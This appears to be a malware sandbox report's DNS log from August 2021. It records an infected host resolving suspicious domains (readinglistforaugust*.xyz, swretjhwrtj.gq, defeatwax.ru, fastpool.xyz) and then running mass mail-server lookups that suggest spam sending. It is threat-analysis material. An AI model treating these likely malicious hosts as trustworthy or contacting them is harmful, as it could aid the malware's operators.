Aug 24, 2021 08:50:58.493510962 CEST	192.168.2.5	8.8.8.8	0x2082	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.779577017 CEST	192.168.2.5	8.8.8.8	0x7bf2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:58.972157955 CEST	192.168.2.5	8.8.8.8	0xf900	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.066301107 CEST	192.168.2.5	8.8.8.8	0xdb24	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.103043079 CEST	192.168.2.5	8.8.8.8	0xa59a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.192188025 CEST	192.168.2.5	8.8.8.8	0xb3c6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.380579948 CEST	192.168.2.5	8.8.8.8	0xef25	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.557105064 CEST	192.168.2.5	8.8.8.8	0x3665	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.659188986 CEST	192.168.2.5	8.8.8.8	0x7d7a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.720877886 CEST	192.168.2.5	8.8.8.8	0xde63	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.798669100 CEST	192.168.2.5	8.8.8.8	0x59e4	Standard query (0)	mx1.ocps.net.gslb.pphosted.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:59.936197996 CEST	192.168.2.5	8.8.8.8	0x64b2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.313167095 CEST	192.168.2.5	8.8.8.8	0xf522	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.465769053 CEST	192.168.2.5	8.8.8.8	0x5c11	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.656196117 CEST	192.168.2.5	8.8.8.8	0x983e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.729048014 CEST	192.168.2.5	8.8.8.8	0xdd30	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.846339941 CEST	192.168.2.5	8.8.8.8	0x1df7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:00.927592039 CEST	192.168.2.5	8.8.8.8	0x3528	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:01.086968899 CEST	192.168.2.5	8.8.8.8	0xc235	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:01.786490917 CEST	192.168.2.5	8.8.8.8	0x5aec	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:02.094145060 CEST	192.168.2.5	8.8.8.8	0xa442	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:02.323807001 CEST	192.168.2.5	8.8.8.8	0xbcc9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.486288071 CEST	192.168.2.5	8.8.8.8	0x3f23	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.535037041 CEST	192.168.2.5	8.8.8.8	0x4d2b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.535315990 CEST	192.168.2.5	8.8.8.8	0xbcc9	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.726380110 CEST	192.168.2.5	8.8.8.8	0xcf20	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.798247099 CEST	192.168.2.5	8.8.8.8	0x5ab6	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.842766047 CEST	192.168.2.5	8.8.8.8	0xadd1	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.892827988 CEST	192.168.2.5	8.8.8.8	0xe4fb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:03.956800938 CEST	192.168.2.5	8.8.8.8	0x8f24	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.526077986 CEST	192.168.2.5	8.8.8.8	0xe4b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.596307039 CEST	192.168.2.5	8.8.8.8	0x4fcf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.796845913 CEST	192.168.2.5	8.8.8.8	0x67bb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:05.877262115 CEST	192.168.2.5	8.8.8.8	0xec8c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.053561926 CEST	192.168.2.5	8.8.8.8	0xea92	Standard query (0)	stargateworld.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:06.107882023 CEST	192.168.2.5	8.8.8.8	0x4e7c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.136970997 CEST	192.168.2.5	8.8.8.8	0x507b	Standard query (0)	mx156.hostedmxserver.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.170816898 CEST	192.168.2.5	8.8.8.8	0x4094	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.209219933 CEST	192.168.2.5	8.8.8.8	0x7890	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.281125069 CEST	192.168.2.5	8.8.8.8	0x61d0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.435890913 CEST	192.168.2.5	8.8.8.8	0x9058	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.524929047 CEST	192.168.2.5	8.8.8.8	0xd7a9	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:06.866883993 CEST	192.168.2.5	8.8.8.8	0x2f11	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.036696911 CEST	192.168.2.5	8.8.8.8	0xf8fc	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.148051977 CEST	192.168.2.5	8.8.8.8	0x736b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.234250069 CEST	192.168.2.5	8.8.8.8	0x19d7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.446901083 CEST	192.168.2.5	8.8.8.8	0x387c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.494518995 CEST	192.168.2.5	8.8.8.8	0x98eb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.553772926 CEST	192.168.2.5	8.8.8.8	0x6350	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.600720882 CEST	192.168.2.5	8.8.8.8	0x1b9f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.822844028 CEST	192.168.2.5	8.8.8.8	0x6182	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.898046017 CEST	192.168.2.5	8.8.8.8	0x9779	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:07.964318037 CEST	192.168.2.5	8.8.8.8	0x4e49	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.016828060 CEST	192.168.2.5	8.8.8.8	0x8681	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.078572989 CEST	192.168.2.5	8.8.8.8	0xdd75	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.162746906 CEST	192.168.2.5	8.8.8.8	0x843c	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.212114096 CEST	192.168.2.5	8.8.8.8	0x7755	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.308532000 CEST	192.168.2.5	8.8.8.8	0xaded	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.881127119 CEST	192.168.2.5	8.8.8.8	0x6b5f	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:08.989871979 CEST	192.168.2.5	8.8.8.8	0x90b3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.146878958 CEST	192.168.2.5	8.8.8.8	0xa806	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.153620958 CEST	192.168.2.5	8.8.8.8	0x613c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.228378057 CEST	192.168.2.5	8.8.8.8	0xd396	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.628966093 CEST	192.168.2.5	8.8.8.8	0x3597	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:09.698446035 CEST	192.168.2.5	8.8.8.8	0xe0ea	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.143352032 CEST	192.168.2.5	8.8.8.8	0x853	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.207554102 CEST	192.168.2.5	8.8.8.8	0x8fc3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.282567024 CEST	192.168.2.5	8.8.8.8	0xebb2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.337451935 CEST	192.168.2.5	8.8.8.8	0x5c71	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.389774084 CEST	192.168.2.5	8.8.8.8	0x100c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.448352098 CEST	192.168.2.5	8.8.8.8	0x6d2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.553411961 CEST	192.168.2.5	8.8.8.8	0x3a1e	Standard query (0)	doctor.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:10.633003950 CEST	192.168.2.5	8.8.8.8	0xffe2	Standard query (0)	mx00.mail.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.716881037 CEST	192.168.2.5	8.8.8.8	0xa4e3	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.764628887 CEST	192.168.2.5	8.8.8.8	0x2ccb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.798003912 CEST	192.168.2.5	8.8.8.8	0xb039	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:10.844233036 CEST	192.168.2.5	8.8.8.8	0x4995	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:11.023504019 CEST	192.168.2.5	8.8.8.8	0x8aae	Standard query (0)	gorodok.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:11.111532927 CEST	192.168.2.5	8.8.8.8	0x1e9	Standard query (0)	mx.gorodok.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:11.755490065 CEST	192.168.2.5	8.8.8.8	0xde43	Standard query (0)	smtp.yopmail.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:12.010492086 CEST	192.168.2.5	8.8.8.8	0xfce9	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:12.876951933 CEST	192.168.2.5	8.8.8.8	0x4c30	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.219654083 CEST	192.168.2.5	8.8.8.8	0xdb6e	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:51:14.457901955 CEST	192.168.2.5	8.8.8.8	0x9032	Standard query (0)	hongkong.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:51:14.667634010 CEST	192.168.2.5	8.8.8.8	0x86b6	Standard query (0)	mail.mailerhost.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 24, 2021 08:48:59.446058035 CEST	8.8.8.8	192.168.2.5	0x58c3	Name error (3)	readinglistforaugust1.xyz	none	none	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:59.503024101 CEST	8.8.8.8	192.168.2.5	0xb9e2	No error (0)	readinglistforaugust2.xyz		95.213.224.6	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:11.452486992 CEST	8.8.8.8	192.168.2.5	0xa4fa	No error (0)	readinglistforaugust3.xyz		212.224.105.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.795989037 CEST	8.8.8.8	192.168.2.5	0x61e0	No error (0)	eduarroma.tumblr.com		74.114.154.18	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.795989037 CEST	8.8.8.8	192.168.2.5	0x61e0	No error (0)	eduarroma.tumblr.com		74.114.154.22	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.904937029 CEST	8.8.8.8	192.168.2.5	0xeff4	No error (0)	swretjhwrtj.gq		172.67.216.236	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.904937029 CEST	8.8.8.8	192.168.2.5	0xeff4	No error (0)	swretjhwrtj.gq		104.21.86.82	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:36.055778027 CEST	8.8.8.8	192.168.2.5	0x3842	No error (0)	readinglistforaugust3.xyz		212.224.105.79	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:38.565742970 CEST	8.8.8.8	192.168.2.5	0xddbc	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:49:38.637031078 CEST	8.8.8.8	192.168.2.5	0xd378	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Aug 24, 2021 08:49:57.128109932 CEST	8.8.8.8	192.168.2.5	0xfefa	No error (0)	defeatwax.ru		193.56.146.188	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:07.633028984 CEST	8.8.8.8	192.168.2.5	0x3691	No error (0)	telete.in		195.201.225.248	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.116544008 CEST	8.8.8.8	192.168.2.5	0x29c5	No error (0)	msn.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.158874035 CEST	8.8.8.8	192.168.2.5	0xe144	No error (0)	hotmail.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.159703016 CEST	8.8.8.8	192.168.2.5	0x571f	No error (0)	msn-com.olc.protection.outlook.com		104.47.58.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.159703016 CEST	8.8.8.8	192.168.2.5	0x571f	No error (0)	msn-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.192308903 CEST	8.8.8.8	192.168.2.5	0xc0b0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.192308903 CEST	8.8.8.8	192.168.2.5	0xc0b0	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.232887030 CEST	8.8.8.8	192.168.2.5	0x41cf	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.232940912 CEST	8.8.8.8	192.168.2.5	0x3279	No error (0)	invalid.nl			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.259018898 CEST	8.8.8.8	192.168.2.5	0x19b2	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.288916111 CEST	8.8.8.8	192.168.2.5	0x2fe5	No error (0)	mx.invalid.nl		82.94.250.247	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.336415052 CEST	8.8.8.8	192.168.2.5	0xa42a	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.392020941 CEST	8.8.8.8	192.168.2.5	0xd0cf	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.459214926 CEST	8.8.8.8	192.168.2.5	0xac0	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.506870985 CEST	8.8.8.8	192.168.2.5	0x2025	No error (0)	www.google.com		216.58.215.228	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.521406889 CEST	8.8.8.8	192.168.2.5	0x2b7a	No error (0)	celebslive.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.521406889 CEST	8.8.8.8	192.168.2.5	0x2b7a	No error (0)	celebslive.net			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		157.230.233.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		37.139.4.171	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		134.209.79.108	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		37.139.4.118	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		37.139.4.134	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		143.198.175.12	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		68.183.127.86	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.593472004 CEST	8.8.8.8	192.168.2.5	0x1caf	No error (0)	mx195.mb5p.com		37.139.4.163	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.749398947 CEST	8.8.8.8	192.168.2.5	0xb92	No error (0)	fastpool.xyz		213.91.128.133	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.088681936 CEST	8.8.8.8	192.168.2.5	0x8dc7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.088681936 CEST	8.8.8.8	192.168.2.5	0x8dc7	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.631715059 CEST	8.8.8.8	192.168.2.5	0x81fd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.631715059 CEST	8.8.8.8	192.168.2.5	0x81fd	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.876173973 CEST	8.8.8.8	192.168.2.5	0x3dad	No error (0)	vyahoo.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:10.876173973 CEST	8.8.8.8	192.168.2.5	0x3dad	No error (0)	vyahoo.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		157.230.233.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		68.183.127.86	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		37.139.4.118	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		37.139.4.163	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		37.139.4.171	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		134.209.79.108	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		143.198.175.12	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.922385931 CEST	8.8.8.8	192.168.2.5	0x9595	No error (0)	mx37.m1bp.com		37.139.4.134	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.252142906 CEST	8.8.8.8	192.168.2.5	0xd4b2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.252142906 CEST	8.8.8.8	192.168.2.5	0xd4b2	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.254251003 CEST	8.8.8.8	192.168.2.5	0x371b	No error (0)	outlook.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:11.292457104 CEST	8.8.8.8	192.168.2.5	0x87dd	No error (0)	outlook-com.olc.protection.outlook.com		104.47.66.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.292457104 CEST	8.8.8.8	192.168.2.5	0x87dd	No error (0)	outlook-com.olc.protection.outlook.com		104.47.55.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.899051905 CEST	8.8.8.8	192.168.2.5	0x7ecc	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.899051905 CEST	8.8.8.8	192.168.2.5	0x7ecc	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.045166016 CEST	8.8.8.8	192.168.2.5	0xf196	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.045166016 CEST	8.8.8.8	192.168.2.5	0xf196	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.213113070 CEST	8.8.8.8	192.168.2.5	0x7627	No error (0)	hotm.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		37.139.4.118	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		157.230.233.4	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		68.183.127.86	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		134.209.79.108	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		37.139.4.171	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		143.198.175.12	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		37.139.4.134	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.277523994 CEST	8.8.8.8	192.168.2.5	0x9ed7	No error (0)	mx156.hostedmxserver.com		37.139.4.163	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.662396908 CEST	8.8.8.8	192.168.2.5	0xfa3d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.57.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.662396908 CEST	8.8.8.8	192.168.2.5	0xfa3d	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.56.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.684761047 CEST	8.8.8.8	192.168.2.5	0xc561	No error (0)	live.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:12.744210958 CEST	8.8.8.8	192.168.2.5	0x3248	No error (0)	live-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.744210958 CEST	8.8.8.8	192.168.2.5	0x3248	No error (0)	live-com.olc.protection.outlook.com		104.47.73.161	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.018223047 CEST	8.8.8.8	192.168.2.5	0x3c13	No error (0)	superdada.it			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:13.062243938 CEST	8.8.8.8	192.168.2.5	0x68	No error (0)	mx.powered.name		62.141.42.208	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.249691963 CEST	8.8.8.8	192.168.2.5	0xdc52	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.249691963 CEST	8.8.8.8	192.168.2.5	0xdc52	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.73.33	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.503674030 CEST	8.8.8.8	192.168.2.5	0xb11d	No error (0)	iinden.gute.se			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.589893103 CEST	8.8.8.8	192.168.2.5	0xc0da	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:14.958040953 CEST	8.8.8.8	192.168.2.5	0xa6d4	No error (0)	www.google.co.uk		172.217.168.67	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:14.986465931 CEST	8.8.8.8	192.168.2.5	0x1194	No error (0)	korea.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:14.986465931 CEST	8.8.8.8	192.168.2.5	0x1194	No error (0)	korea.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:14.986465931 CEST	8.8.8.8	192.168.2.5	0x1194	No error (0)	korea.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:14.986465931 CEST	8.8.8.8	192.168.2.5	0x1194	No error (0)	korea.com			MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:15.027899981 CEST	8.8.8.8	192.168.2.5	0x3f0b	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.74.33	A (IP address)	IN (0x0001)
